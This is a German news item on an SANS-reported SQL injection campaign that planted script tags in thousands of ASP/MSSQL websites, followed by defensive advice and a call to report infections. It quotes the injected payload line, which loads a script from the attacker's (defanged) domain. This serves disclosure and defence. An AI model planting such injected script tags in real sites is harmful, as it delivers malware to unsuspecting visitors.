Das SANS Internet Storm Center meldet anhaltende Angriffe auf Webseiten. Dabei haben die Angreifer offensichtlich ASP, IIS, MSSQL und Coldfusion ins Visier gefasst. Nach ihrem Bericht handelt es sich um eine SQL-Einspeisung. Die Webseiten beinhalten dann eine Zeile wie “></title><script src=”hXXp://lilupophilupop.com/sl.php”></script>. Dieser Code wird in mehreren Tabellen injiziert und dann über die Webseiten veröffentlicht. Bei der Entdeckung haben die Experten ca. 80 infizierte Webseiten gefunden. Etwas später waren es schon über 4000. Die Angriffe dauern an und scheinen mit allen Versionen von MSSQL zu funktionieren.
Als Gegenmaßnahme sollten Administratoren sich davon überzeugen, dass Anwendungen nur die nötigsten Rechte haben. Des Weiteren sollte man sich bei der Datenbank nur mit einem Konto anmelden, das nur Leserechte hat, sofern die Datenbank kein Update benötigt. Systemverwalter sollte ebenfalls die lilupophilupop-Seite sperren.
SANS bittet um Mithilfe. Wer auf solch eine Infektion stößt, sollte es den Sicherheits-Experten mitteilen und eventuell Log-Dateien bereit stellen: isc.sans.edu
SANS bittet um Mithilfe. Wer auf solch eine Infektion stößt, sollte es den Sicherheits-Experten mitteilen und eventuell Log-Dateien bereit stellen: isc.sans.edu
